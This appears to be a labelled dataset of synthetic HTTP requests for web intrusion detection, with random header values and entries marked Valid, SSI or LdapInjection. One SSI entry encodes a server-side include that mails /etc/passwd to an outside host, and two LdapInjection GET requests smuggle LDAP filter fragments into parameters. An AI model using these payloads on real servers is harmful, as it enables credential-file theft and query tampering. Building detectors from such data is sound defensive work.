Content-MD5: d1I1Tm9vZWVhRXRtSTB0bA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 15 Oct 06 10:34:12 GMT
Last-Modified: Sat, 15 Dec 07 16:47:42 UTC
Host: www.lsiekbr.be:80
Connection: rolddt
Accept: */*;q=0.5
Accept-Charset: iso-8859-3;q=0.0, cp-950
Accept-Encoding: 
Accept-Language: r-neee1i;q=0.9, eat-iic4iE8e
Cache-Control: max-stale=2
Client-ip: 248.78.197.68
Cookie: ntnetatetnae=0o9D;uautoexec0FgeUF1khttps=422778;eooe4reiIde=xtermLlsa;xsgtteene=i anedsTeshstdinnegchild@h
Cookie2: $Version="432"
Date: Wed, 10 Jun 09 20:34:47 UTC
ETag: "Why3H83yM7wv-4u"
Expect: 100-continue
From: msDNtTe@mtt5jy.de
If-Modified-Since: Sun, 14 Feb 10 24:45:38 CET
If-Unmodified-Since: Sun, 28 Oct 07 18:53:29 GMT
If-Match: "2nwM6L8d9cr204v"
If-None-Match: "b5eGwm2uMSm5EoVX"
If-Range: "o-yDpiW8delak7au"
Max-Forwards: 19
MIME-Version: 6.3
Pragma: at8mmbf='ayh'
Proxy-Authorization: NTLM aXF6Z3NCeWUzYXNtQ09NdW05YXRpcnNzYm8zdFRuYUFlYWpmb2VlbmU=
Authorization: Basic c2p5bXJvdDplaW5JVHZn
Range: -43411,-175805,6-
Referer: http://www.esls7.be/bqnagoh/al0lIxof.conf
TE: trailers
Trailer: Expect
User-Agent: Mozilla/6.2 (X11; U; Open BSD i586 3.1; eo-na; rv:4.9.5) Gecko/61116455
UA-CPU: StrongARM
UA-Disp: 179,7168,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 669x1617
Via: FTP/8.1 www.eoMO.gif
Transfer-Encoding: gzip
Upgrade: ioeroj/6.7, urpa/3.7, tthp/8.6
Warning: 310 www.tuatshe.jpg:92418 "aTmit2nDei" "Sun, 14 Mar 10 19:02:00 UTC"
X-Forwarded-For: 202.225.233.245
X-Serial-Number: 27066605
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

getA2tfuuwW=w0erg&NT=s2tioa@%wssgroup byriaOe&QuYJcatFsincludeUH=bpnftnemnnatmo3locationsto

End - Id: 7793
Start - Id: 266
class: Valid
GET /hi6ee/rj/eV/iY@tI-CHzRdmiJ/Or5dt/mpgOeeeflhrjog/aVKPi/aDg6fpJs.pl?i4ceaas=uekloresDiwhereh&mgGoePensgup=9W1R&hesq=58851518&uirmotwbnttzene=ek-t5jcs7&6tcPg51UT=2479241207&ouNtdxl8le=npst&uerisp=2&rses=the3rfatW&clikeTsamr_.=dt%3CI%3F%3Btyllsrd&etTa99oi8ceuga=taGI&sp=6ucmochat&2mooc8l=%5C%25wt&griulolocls=lJj6%40&et=nnEgme0s&2naoeefe9=oiIlS.o HTTP/1.1
Host: www.fna5ori.ch
Connection: close
Accept: audio/*;q=0.4, image/*
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.2
Accept-Language: p-olc;q=0.7, pt29-i;q=0.6, se9re-fioo;q=0.3, aohgro-zlgnede1
Cache-Control: min-fresh=546
Client-ip: 237.190.39.41
Cookie: eestP=ei;ntg6lerL9hlw=autoexec3nulle;ihoi=pd6e;yc7=iywe98Iuwc93
Cookie2: $Version="81"
Date: Thu, 05 Apr 07 10:33:12 CET
ETag: W/"6VFAg2ULcs_EddMM"
Expect: 100-continue
From: 6bLaew@vziehEtalu.st
If-Modified-Since: Sun, 12 Sep 04 24:43:41 GMT
If-Unmodified-Since: Mon, 15 Mar 10 18:11:53 UTC
If-Match: "Z1AitaU_SZZU7nWO"
If-None-Match: *
If-Range: Wed, 08 Feb 06 18:26:11 CET
Max-Forwards: 9
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: NTLM aXRzcHdpdHVqVnRpMG9hZTNtcmRpZXR1RXNoc2hjbHNhc3F0ZXNCMWFzcmk=
Authorization: Digest cnonce="dsosoe8o"
Range: 45-32,65908-442586,1566-181
Referer: /urpsgEaf/exmtsoni/o8es.php3
TE: trailers
Trailer: Expect
User-Agent: Mozilla/2.2 (Machintosh; U; Mac OS X 2.1; ts-ga; rv:6.7.5) Gecko/96239264
UA-CPU: Sparc
UA-Disp: 223,1661,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 4622x2387
Via: 7.1 www.hiUezsi.shtml, HTTP/4.8 126.109.98.57, 8.8 25.169.76.33
Transfer-Encoding: gzip
Upgrade: ire50s/8.5, lsas/9.0, cuedrY/9.7, o119/9.2
Warning: 166 26.238.254.174 "oet2" 
X-Forwarded-For: 127.92.165.64
X-Serial-Number: 388092866322
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 266
Start - Id: 40013
class: SSI
GET /68WMo0xV0XLqipbKJzK/tvhawc/7oHef0i/ezrXj6PyHsCrSZlK/LTD2yPHx/9jMsQXgLpJ/hRoxmiLiopen0W/kktNrilB5ZXfv/m0konnsulr5rs5Ct.css?ae5etc=6&iselao8oph=+c&ee=%3C%21--+%23exec++cmd%3D%22%2Fbin%2Fmail+++++opbmnns.com++%3C+++++%2Fetc%2Fpasswd%22--%3E&gesatqoc=e%26linkslikeiQico&erhr1bHmi6ditj=am2Elbe0l HTTP/1.0
Host: www.xr6ebss.fr
Connection: Yotoehe
Accept: application/x-tar;q=0.7
Accept-Charset: euc-jp, iso-10646-ucs-2, macintosh
Accept-Encoding: *;q=0.5
Accept-Language: ncd4-Ex, oaslht-o, iCo-yetrt3;q=0.3
Cache-Control: no-store
Client-ip: 133.142.247.233
Cookie: LzGIshutdownr9.P=izUliUqRO;HtdlTedqphsen1=mWawRkCT92pV;ettuf=10;5dtfaik=80
Cookie2: $Version="2"
Date: Sat, 07 Feb 09 07:48:44 GMT
ETag: W/".1jeLkNVQ5pd_jD-7"
Expect: hniFtla
From: l1ahde@nablau.fr
If-Modified-Since: Sun, 18 Apr 10 15:49:59 CET
If-Unmodified-Since: Wed, 15 Oct 08 14:19:01 UTC
If-Match: "DBi-CJQy63mNzKEzv"
If-None-Match: *
If-Range: Fri, 13 Jan 06 18:03:33 GMT
Max-Forwards: 167
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: ehoi omrlLio0=mhlctsr
Authorization: Basic ZXltZWY6dWhkcG5l
Range: -1534
Referer: http://oiOtbjz.st/0nbsa/HeeadE.bin
TE: trailers,deflate;q=0.0
Trailer: Host
User-Agent: Mozilla/6.4 (compatible; MSIE 7.0; Linux i586; Ina1zrte; ldetn0mqoJ)
UA-CPU: Sparc
UA-Disp: 5489,849,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 5394x1347
Via: 2.6 www.nspa.htm:75, HTTP/7.2 www.Hrgghmlm.tiff
Transfer-Encoding: identity
Upgrade: temy/8.7, Aane0/2.7, d4ta/9.2
Warning: 858 65.172.196.46 "sae0vvsyhhdctrb" 
X-Serial-Number: 18116
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40013
Start - Id: 26227
class: Valid
GET /SiheHeortsheh/eaeb4ndfse/_FHduFA0/idiEZloJt.mspx?e8eoNshiowtleA=wZxSb HTTP/1.0
Host: 119.133.83.61:80
Connection: close
Accept: */*;q=0.0
Accept-Charset: iso-8859-8-i;q=0.0, x-mac-hebrew;q=0.6, iso-8859-7;q=0.2, iso-8859-1, hz-gb-2312
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.5
Cache-Control: max-age=9885
Client-ip: 237.86.185.182
Cookie: house0sotl=sjoni
Cookie2: $Version="776"
Date: Wed, 21 Dec 05 15:19:00 GMT
ETag: W/"-jfRr2Ew35J@o6u"
Expect: 100-continue
From: nee1w@ahcdw.uk
If-Modified-Since: Sun, 01 Oct 06 20:00:51 UTC
If-Unmodified-Since: Tue, 20 Sep 05 08:17:56 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 31 Oct 08 19:33:02 CET
Max-Forwards: 88
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Digest username="clno"
Range: 7313-
Referer: http://www.inii.cz/ouUd.sh
TE: chunked;q=0.7,trailers
Trailer: Accept-Charset
User-Agent: rcjwbXjl1 http://www.aaNdst1t.biz
UA-CPU: PowerPC
UA-Disp: 9474,169,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 539x1733
Via: 7.4 www.ftemD8s.shtml, 3.0 www.sgpf.jpeg, ir2et/4.4 176.166.72.110:91
Transfer-Encoding: nWLa
Upgrade: iguI/8.7, wzsse4/6.7
Warning: 403 www.1ernaeea.tiff "sB1ntt" "Thu, 29 Jan 04 19:12:54 UTC"
X-Forwarded-For: 248.73.239.249
X-Serial-Number: 30560
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 26227
Start - Id: 25345
class: Valid
GET /ihcareetiavLn2.jsp?nanEf8bl8w7eouh=500651&mg=aofqatZRmdH&C4_T=iauUarin&mne3lbftT=04907&rm=%3Cicuawdp&yfi98ams=usrtSt&gMrs6r=tn0wgetdnmi%3Dlike%7Cdbtseelog&nn5en=%25ulaso&lhaQw4iyt=t&tytn=9dR0n7 HTTP/1.0
Host: www.sukenyak8r.be
Connection: weru
Accept: */*;q=0.3
Accept-Charset: iso-8859-8-i;q=0.7, cp-950, iso-2022-kr, cp-950
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: min-fresh=7947
Client-ip: 109.115.172.149
Cookie: adwsoaniihnxas=[Nob9ugm];oavrt= allgesr>;eonelytu=ysen
Cookie2: $Version="296"
Date: Tue, 15 Jun 04 23:07:50 CET
ETag: W/"Lu@0SAFVopAC9ECD"
Expect: 100-continue
From: hait@1onahThh5t.net
If-Modified-Since: Tue, 15 Apr 08 04:54:04 GMT
If-Unmodified-Since: Thu, 01 Feb 07 06:55:52 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 08 Nov 05 07:48:44 GMT
Max-Forwards: 5
MIME-Version: 0.8
Pragma: ngldo=el
Proxy-Authorization: Basic YXhhZjplaWliblQ=
Authorization: Digest nonce
Range: -5,9601-,-779
Referer: /auehhsE/4Ejhhscs.sh
TE: gzip
Trailer: Connection
User-Agent: 4eatte (t.C7hxb; nmrdVn; r0DN2J8aS; xIX-r_So@; efLYCT3r0)
UA-CPU: 68000
UA-Disp: 645,174,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 3370x895
Via: 0.0 77.113.241.143
Transfer-Encoding: iitlaa; aitei=tste
Upgrade: ato/3.1
Warning: 507 www.m5ctauut.htm "aje7owrp58as" "Wed, 13 Jan 10 11:26:34 GMT"
X-Forwarded-For: 117.22.170.105
X-Serial-Number: 29493838100482691776
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25345
Start - Id: 14869
class: Valid
GET /lWoeLVF4JpykBZ/BTG4-Z/yZtrF/We0J53DyJbKOzWT/PBUAmRUyDB.9uq/bTm243Oi_N7hewB/ixU4Yk0sStzN44EGz/nJoCI6px5/cdlFzD0trU/sFvu17khy_Ux6/tyQ0a3EYdXbebMgVf7.bin? HTTP/1.1
Host: www.cdt8mri6.ch
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: koi8;q=0.5, x-mac-chinesetrad;q=0.4, iso-2022-kr, x-mac-chinesesimp;q=0.6
Accept-Encoding: 
Accept-Language: h6-teuA, ca-tjecso;q=0.4, dy8eYgt-ol, xmiEa-hhkwo
Cache-Control: ie1=rlatl4eH
Client-ip: 239.109.47.175
Cookie: 3eR8Sdyp=84;1oOlttpm=071357
Cookie2: $Version="76"
Date: Wed, 01 Aug 07 07:30:59 CET
ETag: W/"7Ww2LqRBAnXCQUCD93"
Expect: 6n8e
From: esqSl33e@mnaR5.com
If-Modified-Since: Tue, 25 Apr 06 17:27:47 GMT
If-Unmodified-Since: Wed, 06 Oct 04 08:56:13 CET
If-Match: *
If-None-Match: "-ZvH0G5sSFCUJRo"
If-Range: *
Max-Forwards: 5290
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: Basic dGxuYXQ6dDd2T2lyZQ==
Authorization: Basic NGFodFJvbjpUaXNpM08=
Range: -43,-61335,692292-223
Referer: /rfdaifry/qcSnw.js
TE: trailers,trailers
Trailer: Referer
User-Agent: Mozilla/3.2 (compatible; ade2; Linux i586; o40lr; r7ttrWeu)
UA-CPU: Sparc
UA-Disp: 448,204,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 923x8805
Via: FTP/5.8 98.44.93.234:90
Transfer-Encoding: z3et
Upgrade: titwo/7.7
Warning: 225 184.210.143.62:77965 "ecfsd0heehezcle" "Sat, 24 Feb 07 14:16:26 UTC"
X-Forwarded-For: 121.34.208.174
X-Serial-Number: 883982110
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14869
Start - Id: 37930
class: LdapInjection
GET /c5Z@ewHshutdownrnPGJvbscriptN/EeoiT81g/NWq5QffOiv0WE/1yiIM_.html?e3ms5=nCA7rHAJB5&ssWeulsaoi8dH=rt5&Anj7J5=6tnuboot.inil%40&l5Yaeeetaba=einni%29%28%26%28objectClass+++%3D++++n5p*%29&nc6Fprocessing-instructionLhlstL3=e%40s&oirOnie0rsni=74819375 HTTP/1.1
Host: www.Lehose.de:80
Connection: eenefoog
Accept: audio/*, application/postscript;q=0.5, application/postscript
Accept-Charset: *;q=0.3
Accept-Encoding: gzip;q=0.2, deflate;q=0.6
Accept-Language: *
Cache-Control: no-store
Client-ip: 10.62.13.43
Cookie: FCtmpHM=trstmpebi6eicee;sGsHi5hlneqia7n=905;tiAeouiueg207=48409;wldt5odmso2s=>enjtltnaccess_logC0aIjor?etdo
Cookie2: $Version="4"
Date: Tue, 21 Dec 04 15:06:07 CET
ETag: W/"JIaiNtCmlEs.7pkMV8yn"
Expect: dtawu=4tsB
From: zoeyt@dfSho.com
If-Modified-Since: Thu, 22 Jun 06 19:05:47 UTC
If-Unmodified-Since: Tue, 14 Sep 04 04:27:27 CET
If-Match: *
If-None-Match: "GbVs1amUiJ9h-9Hn0"
If-Range: Tue, 01 Apr 08 03:09:34 GMT
Max-Forwards: 5936
MIME-Version: 8.6
Pragma: oaNmhre=cUn
Proxy-Authorization: Basic VWFjaDp3YXls
Authorization: ethp 2hhte=rcbs
Range: 92-
Referer: http://njus.be/Rosdn/dzt6g2/wr6t/r44Hoi/9itrh7cj.html
TE: trailers
Trailer: Upgrade
User-Agent: Mozilla/4.3 (X11; U; Open BSD i386 5.7; ee-vr; rv:3.2.9) Gecko/93449694
UA-CPU: MIPS
UA-Disp: 472,2226,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 649x451
Via: 2.4 www.oesljr.shtml:43
Transfer-Encoding: gzip
Upgrade: udtE/5.5, hiteNc/1.2, tffIc/7.5, nhr/8.0, ptIvu/0.9
Warning: 778 www.sriAh.html "u4ef" 
X-Forwarded-For: 143.12.94.194
X-Serial-Number: 03021
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37930
Start - Id: 11043
class: Valid
GET /ws2toO/fozPMbkOk-/goarlelsiiWden/Kd.x2/gdiTlivncrtiA/eestmp6ki/153gKlnNVv/n0rman9aiee7Neir5rB/hrnihoovntejsa8/ieoony3utoIehhufAesl.swf? HTTP/1.0
Host: 45.215.77.58
Connection: 2gepegts
Accept: image/*
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 242.189.133.239
Cookie: ahhfeuhe5ntpda=tl3Cja88;rcarro=cndO_k2F;Uepqiuanf=bt(i;t9sOeth=40471916;ejdaoe=)t&~d
Cookie2: $Version="171"
Date: Sat, 07 Apr 07 20:54:16 CET
ETag: "cWdUekrkxyxogQ4xRme"
Expect: 100-continue
From: szi40en@pbaUtnm9st.st
If-Modified-Since: Tue, 05 Dec 06 12:18:31 UTC
If-Unmodified-Since: Sun, 29 Mar 09 16:54:55 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 058
MIME-Version: 8.5
Pragma: 4npv=napsghdt
Proxy-Authorization: aeeWg xqe5owa=r1ap5OA
Authorization: NTLM bW9pUm9rZTBIbkNldGRyYnRqVE9obzN0ZnVLbmx5aWt0ZW5laXJlbQ==
Range: 22-392,-6553,-595
Referer: http://www.Nlgieh7.fr/h8wsmrab.wav
TE: trailers,deflate
Trailer: If-None-Match
User-Agent: Mozilla/9.6 (X11; U; Open BSD i586 8.8; xr-ei; rv:1.4.4) Gecko/76260827
UA-CPU: x86
UA-Disp: 8400,268,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 1068x1035
Via: 3.0 20.186.249.163, 6rhg/3.5 www.awKtn.htm, HTTP/5.6 119.153.249.189
Transfer-Encoding: gzip
Upgrade: orc/1.6, 9fle/6.2, 08otw/8.4, Zmleef/2.9, tDi/7.7
Warning: 660 97.116.247.67 "al7pinn" "Wed, 19 Dec 07 14:44:12 CET"
X-Forwarded-For: 42.148.64.117
X-Serial-Number: 86044035
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11043
Start - Id: 31061
class: Valid
GET /irRneanmuzouM/n2mQhM8vjiohXDJOyE/llieterujfatpm/o8SZaccT/efBXN/ecfJEym_4S30g.sh? HTTP/1.1
Host: www.8heFno.be:07
Connection: obxs
Accept: audio/*;q=0.3
Accept-Charset: *;q=0.1
Accept-Encoding: *
Accept-Language: tdlnrc-hn5
Cache-Control: max-age=12932
Client-ip: 23.249.165.211
Cookie: jmlhenekeicNia=yesou;GsmmenmhNX=0
Cookie2: $Version="773"
Date: Wed, 15 Mar 06 22:13:56 GMT
ETag: W/"UHmlLqgMwHtvrSN"
Expect: 100-continue
From: 7hh6G@iXrAni.uk
If-Modified-Since: Sun, 16 Oct 05 11:50:14 GMT
If-Unmodified-Since: Sat, 14 Feb 04 08:20:40 CET
If-Match: "RENl2son5G_5iCI"
If-None-Match: "ODQe2XECcIV7dxtOa2SO"
If-Range: *
Max-Forwards: 6
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: Digest cnonce="zish9"
Authorization: Digest uri=http://smnho5r.de/tess/9m8alon/r0icddn/q7tuL.php4
Range: -2,1-,13058-28
Referer: /oiou/gRbaIpr/deooh/eti3eneJ/aelD.bin
TE: trailers,deflate
Trailer: Accept-Encoding
User-Agent: hdeluhrrbswh
UA-CPU: 68000
UA-Disp: 7666,0977,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 3641x364
Via: 0.0 149.158.0.104:5641, 2.6 7.39.15.171, 9.4 146.203.111.68
Transfer-Encoding: deflate
Upgrade: hme/3.6, eGif/4.2, 3ai/5.4, iFpet/8.3
Warning: 836 www.egnAek.shtml:406 "erkeES8uldsfsrytaIhi" "Sun, 28 Aug 05 15:14:21 CET"
X-Forwarded-For: 212.22.173.189
X-Serial-Number: 0797621
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31061
Start - Id: 37882
class: LdapInjection
GET /Nvhdmc/qJi@BqU6P1_U/louhvcOnouhsaew/MEQnfj/kk/HtwtoSeo/k9Y/rSa8-FlQ0_Qk_/n7lHpsoeEr/aigg.js?elr8DtXo1Rmptst=sn+o9%24st1umetaurnnetcat&fs=ow%29%28%26%28objectClass+++%3D+ho*%29&Hea3ohtia0=hHI7nOiT&9zL.x9C=u%25om4mailen+idoghe%3El%5Deh&ol9aeornPthb=hqmHkljs.9 HTTP/1.0
Host: 159.178.179.220:80
Connection: nnsee
Accept: */*;q=0.6
Accept-Charset: iso-8859-8-i;q=0.4, x-mac-japanese;q=0.6, windows-874;q=0.2, x-mac-greek, x-mac-japanese
Accept-Encoding: *;q=0.1
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 111.218.205.150
Cookie: jTe2aw=dFLCZVZ3-
Cookie2: $Version="4"
Date: Sun, 17 Feb 08 14:04:41 UTC
ETag: W/"f6rJoig5_jWofff_Gc"
Expect: ooauyOdi
From: ftCe@ttlwnsel.it
If-Modified-Since: Tue, 04 Jul 06 06:05:09 GMT
If-Unmodified-Since: Wed, 21 Feb 07 06:54:15 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 240
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: Basic ZXNtaGFTOmF4dWVl
Authorization: Basic dG5vZnF0OmllZWc=
Range: 41-534098,-55
Referer: http://www.arstdr.org/Liatm/nrii0eSn/5Wrfaj2r/oe2ttSx.nsf
TE: trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/8.5 (X11; U; Solaris 5.9; ae-r3; rv:2.9.2) Gecko/39074660
UA-CPU: Sparc
UA-Disp: 322,606,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 649x451
Via: 7.6 146.14.202.143, FTP/5.8 www.tEsa.jpg, FTP/3.1 www.mudpfo.jpg
Transfer-Encoding: compress
Upgrade: 82r/8.3, ehi/8.7
Warning: 941 www.iehcba.gif:913 "elrrSd" 
X-Forwarded-For: 32.94.96.206
X-Serial-Number: 300384
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37882
Start - Id: 26452
class: Valid
GET /dwtelneEtAe7G6lf0/xWu@wGGb/afasgdtosanuHha/3Wcd5PHd1_8/tadPhioS6eEbuwuosut/dbt.mspx? HTTP/1.0
Host: 58.43.222.50
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: only-if-cached
Client-ip: 14.76.173.109
Cookie: mtsNn=ya0;eEiuca4n=41824155;vrli7hg3dPeceqn=]bssliba]4hnandaall2tIbetweene;ZnflNeEn==rn;rpboUd=96;G@x7OuJimDe=cMsUh
Cookie2: $Version="56"
Date: Mon, 24 Aug 09 21:55:15 CET
ETag: W/"aH2jp.pfySLbmKqBQ"
Expect: c3aYiyb
From: d0ne5@ieig.org
If-Modified-Since: Wed, 27 Oct 04 16:23:51 UTC
If-Unmodified-Since: Sat, 19 Feb 05 18:56:02 GMT
If-Match: *
If-None-Match: "N7yHweBcKoC8KMd"
If-Range: "zvbtGWGZjTGL_WP5"
Max-Forwards: 1
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: Digest username="tmff8btS"
Authorization: NTLM YWVTZWFoUm53eWZEaXR1cmtmTm40YmlpYlJPYXlvVG5pdWV1YTQ=
Range: 31-37154,2-
Referer: http://5Rln.st/rfn2/tamsief.asp
TE: trailers
Trailer: Warning
User-Agent: tdahlgFow
UA-CPU: StrongARM
UA-Disp: 719,2731,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 326x7197
Via: sOi/8.4 195.231.110.54, 2.8 49.89.56.192, 5.1 189.84.34.175
Transfer-Encoding: gzip
Upgrade: rNdech/1.9, n3weni/6.6, NEmr/3.7
Warning: 816 www.aegrtfH.jpg "tmrtheosaoahwt" 
X-Forwarded-For: 189.141.174.39
X-Serial-Number: 101021310
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26452
Start - Id: 33936
class: Valid
PUT /muastGsikbhgalsyhd/dhass2osheietohjm/ucw/e2-/a0Nlw3.qPd3p4WkXBGO3.tiff? HTTP/1.1
Content-Length: 15
Content-Language: mvif
Content-Encoding: deflate
Content-Location: http://8rat.biz/ooai.mpeg
Content-MD5: V2ZvazlkNTZiaWJlYXNzbg==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 14 Dec 09 15:25:40 UTC
Last-Modified: Fri, 31 Dec 04 10:45:07 GMT
Host: www.rh8atBoi.cz:80
Connection: Dqg8d
Accept: audio/*, audio/basic;q=0.0, video/mpeg
Accept-Charset: *;q=0.0
Accept-Encoding: deflate;q=0.6, compress;q=0.4, deflate, gzip, compress;q=0.8
Accept-Language: b-otdvelo
Cache-Control: no-store
Client-ip: 75.45.37.90
Cookie: ctt=rpne5s1d1ait;ohbnTeo=hth
Cookie2: $Version="772"
Date: Fri, 03 Jun 05 17:53:05 GMT
ETag: W/"UX@u2qUc9v7MA7-3"
Expect: 100-continue
From: eobeo@7uuevefn.cz
If-Modified-Since: Sat, 01 Apr 06 13:15:34 CET
If-Unmodified-Since: Sat, 26 Sep 09 09:05:09 GMT
If-Match: "VKIzz4vk3twiQ9jzj_B"
If-None-Match: *
If-Range: Mon, 21 Nov 05 20:40:01 CET
Max-Forwards: 20
MIME-Version: 7.8
Pragma: 9roidQa=sgxNehfn
Proxy-Authorization: ddre3t eDfhi=ueIeutii
Authorization: Basic YUtuc2k6bGxlbg==
Range: -768,170433-,-4123
Referer: http://setlhE.de/i08tnot/o00oEs.aspx
TE: gzip;q=0.0,gzip;q=0.1,trailers
Trailer: Transfer-Encoding
User-Agent: aemamatfso/1.9.9.2.4
UA-CPU: x86
UA-Disp: 4653,644,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 442x004
Via: 9.4 www.4qdSdEth.gif, FTP/0.7 83.248.237.195
Transfer-Encoding: identity
Upgrade: mtiv/1.9, Samgmt/6.9, enjtl/7.4
Warning: 993 www.i9tntii7.htm "dhencma" "Sun, 13 Jun 04 16:37:04 GMT"
X-Forwarded-For: 7.63.26.112
X-Serial-Number: 33317815178377
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

nnu4eoE=8RIoPpL

End - Id: 33936
Start - Id: 6747
class: Valid
PUT /moh5gAgmeariiapDmpl/4ccd0Uh/eMPMcfCNbVBwhF04u/oQksyEF9.tiff? HTTP/1.1
Content-Length: 246
Content-Language: 7ufksx2u
Content-Encoding: gzip
Content-Location: http://www.ticha.uk/jtaeglnu/yEdbiwe/oigEAri2/yaObu.pdf
Content-MD5: cmhuc2Vld2JvVG90NHRZdA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 08 May 05 13:15:52 GMT
Last-Modified: Sun, 21 Dec 08 07:37:24 GMT
Host: 208.146.117.147
Connection: lwsoin
Accept: */*;q=0.0
Accept-Charset: hz-gb-2312
Accept-Encoding: 
Accept-Language: iaS-gpereqst;q=0.1
Cache-Control: no-store
Client-ip: 50.80.85.90
Cookie: smgraYmn=emeta;RB0uC0=3535976;ZBD@=2;ottaauafrwiiog=C8Amo4imac
Cookie2: $Version="94"
Date: Sun, 04 Oct 09 16:08:22 GMT
ETag: "M.Q-O9-eHGJeNuT9UW_"
Expect: 100-continue
From: tm3ytg@tnto1ssawe.cz
If-Modified-Since: Tue, 13 Feb 07 18:12:50 GMT
If-Unmodified-Since: Tue, 13 Oct 09 08:19:11 GMT
If-Match: *
If-None-Match: *
If-Range: "vZfI61-lLIlLGmP"
Max-Forwards: 6
MIME-Version: 8.5
Pragma: no-cache
Proxy-Authorization: NTLM aW5pOFZhdnAxZWhtZnBldGdkaERvS3NkNWphYXNzZHRyZnQ2MmV6dWky
Authorization: 5oyft oMeserct=njiUdw
Range: -132996,01904-08
Referer: /4uwric/sanoA.htm
TE: chunked
Trailer: Referer
User-Agent: o_@6eKStQ http://www.ya2eb4uf.de
UA-CPU: StrongARM
UA-Disp: 342,103,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 3268x616
Via: 5.9 29.72.3.218, Tinnd/2.3 www.ieuu.js, 3.7 www.euneawig.shtml
Transfer-Encoding: gzip
Upgrade: rie/7.4, 5Iena/2.4, fuca/0.7
Warning: 720 www.Lerkc.js "ecneoeO" 
X-Forwarded-For: 191.106.203.155
X-Serial-Number: 377808112519787553
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~

CCysrLXf=cz7rlnsi9v5&ttn1hgseat=w:eVtnn&fidle3zulocags=6421&aw=9conCBxm98a&Okmn3Zor6@pJ=761824534&5e6ief=tauel| &rt0Ai2elelsyex=922&iassgsihaaAoIos=ot:-ERkalli&7xmlG3cOcopy=eU4hut8ncjtwet%&sein9gqtay=011895&eAy=dmne&7etsrie1rco=3872031762

End - Id: 6747
Start - Id: 37679
class: LdapInjection
PUT /wvBHth6ZGTOkpnP5cf/slTDTOp/lz/.L17xib0z9@Jkg/qJluwuawnucileN2a/3d/libnVCvlsadminN/k01z.mspx? HTTP/1.0
Content-Length: 212
Content-Language: iooa,o
Content-Encoding: compress
Content-Location: /bRsiixl4.png
Content-MD5: c3RzM2lzenJ1c25tbHM2dA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 02 May 10 12:21:03 UTC
Last-Modified: Tue, 17 Mar 09 18:49:07 UTC
Host: www.tgdOeeia.uk
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: vciaias=b
Client-ip: 71.214.180.23
Cookie: sxi1=Sexuueda-m el7;ec2=douniond
Cookie2: $Version="65"
Date: Tue, 09 Dec 08 04:13:31 CET
ETag: "psRqM.XotLxkP1v7Ri9"
Expect: 100-continue
From: ssDeu@yeiMt.st
If-Modified-Since: Mon, 14 Jul 08 14:54:06 GMT
If-Unmodified-Since: Wed, 20 Sep 06 11:08:30 UTC
If-Match: "fdP.5sI.R-AUru88"
If-None-Match: "gCmDnTP8Ts5Rlvd9-"
If-Range: "vp@jb9@-9zMChTqEUXR"
Max-Forwards: 0654
MIME-Version: 8.1
Pragma: ehne7='y8ixje'
Proxy-Authorization: Digest uri=/heen1roq/eredadu/eloyue/dceeE.cgi
Authorization: Digest opaque="Lrea"
Range: 6058-6,88-,-245437
Referer: /si2wio/rfD3avr/doemseo.wmn
TE: trailers
Trailer: Authorization
